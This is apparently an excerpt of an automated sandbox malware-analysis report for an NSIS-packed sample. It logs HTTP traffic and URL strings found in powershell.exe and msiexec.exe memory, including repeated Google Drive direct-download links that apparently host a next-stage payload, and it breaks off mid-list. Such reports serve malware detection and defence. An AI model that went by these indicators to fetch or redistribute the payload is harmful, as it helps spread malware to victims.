      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lvTj79Wqf7IQPqXc9LIhDplZxpFurjOCd4i9NkftsKE5fNccmDa6P7uWXRY6wEZGjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ofVOmCbap95lBIkTCA-a0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7PpJygco78OAPaK3hFG88oonTt-210VLZpt1h3UkWp4KJjvNTfvmGNA8z53oNzaRXvJhY0Hm0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:48 GMTContent-Security-Policy: script-src 'nonce-zorbvJy5_Y_vFdXBlwFtvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQdH2qI21pfkijE6AqVGEfGxcmAmFSxdvKQQXu42vBc6g9j9DntnMdn8Mrp-HHfcEZ-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-Tknkkwpyd_Y7h1Ylp6MlTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.1776191402.0000000007720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
      Source: powershell.exe, 00000002.00000002.1769645096.0000000003404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microi
      Source: TVPfW4WUdj.exe, TVPfW4WUdj.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2507565714.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2554468315.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1928624482.000000000636B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/N1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/N1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloads
      Source: msiexec.exe, 00000007.00000003.2098333838.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132210940.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP;
      Source: msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858746029.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858789773.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1915078198.000000000632B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPG
      Source: msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990751609.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976166076.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2109648798.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPd3
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPe
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPi
      Source: msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976166076.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847006851.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847090543.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858746029.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1836022196.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858789773.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1835971025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1915078198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942630171.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976116569.0000000006328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPst
      Source: msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990751609.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199945524.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/)
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0
      Source: msiexec.exe, 00000007.00000003.2014166945.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109556504.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2245474853.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2450327813.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2484899489.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2098333838.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132210940.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
      Source: msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download6
      Source: msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942630171.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloadUA
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloada
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloadm
      Source: msiexec.exe, 00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloadn
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2428136172.000000000636B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2472769545.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942449247.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 